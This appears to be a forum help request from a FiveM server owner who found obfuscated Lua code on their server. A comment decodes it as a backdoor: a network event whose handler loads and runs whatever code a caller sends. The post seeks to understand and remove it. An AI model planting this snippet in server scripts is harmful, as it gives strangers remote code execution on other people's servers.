# Can anyone help me with this and tell me what this code does

Tags: lua, decode, fivem

`local LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[6][LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[1]](LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[2]) LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[6][LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[3]](LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[2], function(yeQneqhkCoftBzuUkRobBQiPgNsEinMNtULdtGIgiNknJykVUyjNTsVikuUPSiUPjXODMY) LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[6][LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[4]](LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[6][LHNiRAMgCyvwJwqkkVTivOcNKhxiLrHilbbRnxdxSMJbVWaIdaaJnSlozLSYfxWAxLsKjg[5]](yeQneqhkCoftBzuUkRobBQiPgNsEinMNtULdtGIgiNknJykVUyjNTsVikuUPSiUPjXODMY))() end)`

Absolutely no idea what this is found it inside my fivem server

I have been working in this for 15 days now and so far no solution and because of this code many of my scripts stops working

Comment: `local luawords = {"RegisterNetEvent","helpCode","AddEventHandler","assert","load",_G} _G[RegisterNetEvent](helpCode) _G[AddEventHandler](helpCode, function(malfunc) _G[assert](_G[load](malfunc))() end)` if it gives any sense. I don't speak LUA, sorry…

Comment: yep got it this some sort of coke injection using web panel but still it isnt fully decoded